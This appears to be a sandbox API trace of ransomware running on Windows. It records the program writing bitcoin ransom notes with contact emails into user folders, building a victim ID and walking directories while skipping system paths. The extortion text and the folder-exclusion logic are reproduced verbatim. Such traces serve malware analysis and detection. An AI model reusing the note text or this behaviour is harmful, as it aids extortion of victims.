	[0158.352] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xdc4d01, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x436238c4, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x436238c4, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 1
	[0158.359] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 1
	[0158.359] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0
	[0158.359] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 1
	[0158.359] FindClose (in: hFindFile=0xfb97b0 | out: hFindFile=0xfb97b0) returned 0
	[0158.360] lstrcpyW (in: lpString1=0x18dec4, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users"
	[0158.360] lstrcatW (in: lpString1="C:\\Users", lpString2="\\*.*" | out: lpString1="C:\\Users\\*.*") returned="C:\\Users\\*.*"
	[0158.360] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.360] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.361] wsprintfW (in: param_1=0x18d7b0, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\HELP_DECRYPT_YOUR_FILES.TXT") returned 36
	[0158.361] CreateFileW (lpFileName="C:\\Users\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.364] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0158.364] WriteFile (in: hFile=0x378, lpBuffer=0x18cb68*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18da8c, lpOverlapped=0x0 | out: lpBuffer=0x18cb68*, lpNumberOfBytesWritten=0x18da8c*=0xc46, lpOverlapped=0x0) returned 1
	[0158.367] CloseHandle (hObject=0x378) returned 1
	[0158.367] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cb38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cb38*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.368] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.374] GetUserNameA (in: lpBuffer=0x18ca1c, pcbBuffer=0x18cb34 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cb34) returned 1
	[0158.375] wsprintfW (in: param_1=0x18d9b8, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0158.375] CreateFileW (lpFileName="C:\\Users\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.376] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0158.376] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0158.376] WriteFile (in: hFile=0x378, lpBuffer=0x18d9b8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18da94, lpOverlapped=0x0 | out: lpBuffer=0x18d9b8*, lpNumberOfBytesWritten=0x18da94*=0x30, lpOverlapped=0x0) returned 1
	[0158.376] CloseHandle (hObject=0x378) returned 1
	[0158.377] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0158.377] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0158.377] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0158.378] wsprintfW (in: param_1=0x18d770, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\HELP_DECRYPT_YOUR_FILES.HTML") returned 37
	[0158.378] CreateFileW (lpFileName="C:\\Users\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.381] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0158.381] WriteFile (in: hFile=0x378, lpBuffer=0x18cf64*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18da88, lpOverlapped=0x0 | out: lpBuffer=0x18cf64*, lpNumberOfBytesWritten=0x18da88*=0x808, lpOverlapped=0x0) returned 1
	[0158.384] CloseHandle (hObject=0x378) returned 1
	[0158.390] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0158.390] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18cf4c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18cf4c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0158.391] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0158.391] GetUserNameA (in: lpBuffer=0x18ce30, pcbBuffer=0x18cf48 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18cf48) returned 1
	[0158.392] wsprintfA (in: param_1=0x18d978, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.392] CreateFileW (lpFileName="C:\\Users\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x378
	[0158.393] SetFilePointer (in: hFile=0x378, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0158.393] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0158.393] WriteFile (in: hFile=0x378, lpBuffer=0x18d978*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18da90, lpOverlapped=0x0 | out: lpBuffer=0x18d978*, lpNumberOfBytesWritten=0x18da90*=0x43, lpOverlapped=0x0) returned 1
	[0158.393] CloseHandle (hObject=0x378) returned 1
	[0158.394] FindFirstFileW (in: lpFileName="C:\\Users\\*.*" (normalized: "c:\\users\\*.*"), lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x777cb379, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x777cb379, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9930
	[0158.394] lstrlenW (lpString="C:\\Users\\*.*") returned 12
	[0158.394] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.394] CharLowerBuffW (in: lpsz="C:\\Users\\*.*", cchLength=0xc | out: lpsz="c:\\users\\*.*") returned 0xc
	[0158.394] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.395] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="windows") returned 0x0
	[0158.395] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.395] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="boot") returned 0x0
	[0158.395] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.395] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="system volume information") returned 0x0
	[0158.395] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.396] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.396] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="temp") returned 0x0
	[0158.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.396] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="program files") returned 0x0
	[0158.396] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.397] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.397] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.397] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="appdata") returned 0x0
	[0158.397] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.397] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="application data") returned 0x0
	[0158.397] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.398] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="winnt") returned 0x0
	[0158.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.398] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="tmp") returned 0x0
	[0158.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.398] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="cache") returned 0x0
	[0158.398] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.399] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.399] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="webcache") returned 0x0
	[0158.399] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.399] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="inetcache") returned 0x0
	[0158.421] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.421] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="nvidia") returned 0x0
	[0158.421] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.422] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="packages") returned 0x0
	[0158.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.430] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="cookies") returned 0x0
	[0158.430] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.430] StrStrW (lpFirst="c:\\users\\*.*", lpSrch="programdata") returned 0x0
	[0158.432] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0158.432] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0158.432] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x777cb379, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x777cb379, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.432] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0158.432] FindNextFileW (in: hFindFile=0xfb9930, lpFindFileData=0x18e2d4 | out: lpFindFileData=0x18e2d4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x4f6643a1, ftCreationTime.dwHighDateTime=0x1d112ea, ftLastAccessTime.dwLowDateTime=0x4f6643a1, ftLastAccessTime.dwHighDateTime=0x1d112ea, ftLastWriteTime.dwLowDateTime=0x4f6643a1, ftLastWriteTime.dwHighDateTime=0x1d112ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x0, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1
	[0158.432] lstrcmpW (lpString1="All Users", lpString2="..") returned 1
	[0158.432] lstrcmpW (lpString1="All Users", lpString2=".") returned 1
	[0158.433] lstrcpyW (in: lpString1=0x18dcbc, lpString2="C:\\Users" | out: lpString1="C:\\Users") returned="C:\\Users"
	[0158.433] lstrcatW (in: lpString1="C:\\Users", lpString2="\\" | out: lpString1="C:\\Users\\") returned="C:\\Users\\"
	[0158.433] lstrcatW (in: lpString1="C:\\Users\\", lpString2="All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0158.433] lstrcpyW (in: lpString1=0x18d1b4, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0158.433] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0158.433] lstrcpyW (in: lpString1=0x18cda4, lpString2="C:\\Users\\All Users\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0158.433] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\*.*") returned="C:\\Users\\All Users\\*.*"
	[0158.433] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\*.*" (normalized: "c:\\users\\all users\\*.*"), lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77c1d81c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77c1d81c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb97b0
	[0158.434] lstrlenW (lpString="C:\\Users\\All Users\\*.*") returned 22
	[0158.434] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.435] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\*.*", cchLength=0x16 | out: lpsz="c:\\users\\all users\\*.*") returned 0x16
	[0158.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.435] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="windows") returned 0x0
	[0158.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.435] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="boot") returned 0x0
	[0158.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.435] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="system volume information") returned 0x0
	[0158.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.436] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0158.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.436] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="temp") returned 0x0
	[0158.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.436] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="program files") returned 0x0
	[0158.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.437] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="program files (x86)") returned 0x0
	[0158.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.437] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="appdata") returned 0x0
	[0158.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.437] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="application data") returned 0x0
	[0158.437] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.438] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="winnt") returned 0x0
	[0158.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.438] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="tmp") returned 0x0
	[0158.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.438] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="cache") returned 0x0
	[0158.438] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.439] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="temporary internet files") returned 0x0
	[0158.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.439] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="webcache") returned 0x0
	[0158.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.439] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="inetcache") returned 0x0
	[0158.439] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.439] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="nvidia") returned 0x0
	[0158.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.440] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="packages") returned 0x0
	[0158.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.440] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="cookies") returned 0x0
	[0158.440] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.440] StrStrW (lpFirst="c:\\users\\all users\\*.*", lpSrch="programdata") returned 0x0
	[0158.440] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x77c1d81c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77c1d81c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0158.441] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1
	[0158.441] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcb9c8f, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1
	[0158.442] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1
	[0158.442] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x5d599f22, ftCreationTime.dwHighDateTime=0x1d7005f, ftLastAccessTime.dwLowDateTime=0x5d599f22, ftLastAccessTime.dwHighDateTime=0x1d7005f, ftLastWriteTime.dwLowDateTime=0x5d599f22, ftLastWriteTime.dwHighDateTime=0x1d7005f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1
	[0158.442] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77c1d81c, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x77c1d81c, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77c1d81c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0158.442] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2="..") returned 1
	[0158.442] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.HTML", lpString2=".") returned 1
	[0158.442] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\All Users\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0158.442] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="HELP_DECRYPT_YOUR_FILES.HTML" | out: lpString1="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.HTML") returned="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.HTML"
	[0158.442] lstrlenW (lpString="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.HTML") returned 47
	[0158.442] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0158.443] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\HELP_DECRYPT_YOUR_FILES.HTML", cchLength=0x2f | out: lpsz="c:\\users\\all users\\help_decrypt_your_files.html") returned 0x2f
	[0158.443] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0158.443] StrStrW (lpFirst="c:\\users\\all users\\help_decrypt_your_files.html", lpSrch="help_decrypt_your_files") returned="help_decrypt_your_files.html"
	[0158.443] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77bf771a, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x77bf771a, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x77c1d81c, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0158.443] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2="..") returned 1
	[0158.443] lstrcmpW (lpString1="HELP_DECRYPT_YOUR_FILES.TXT", lpString2=".") returned 1
	[0158.443] lstrcpyW (in: lpString1=0x18d814, lpString2="C:\\Users\\All Users\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
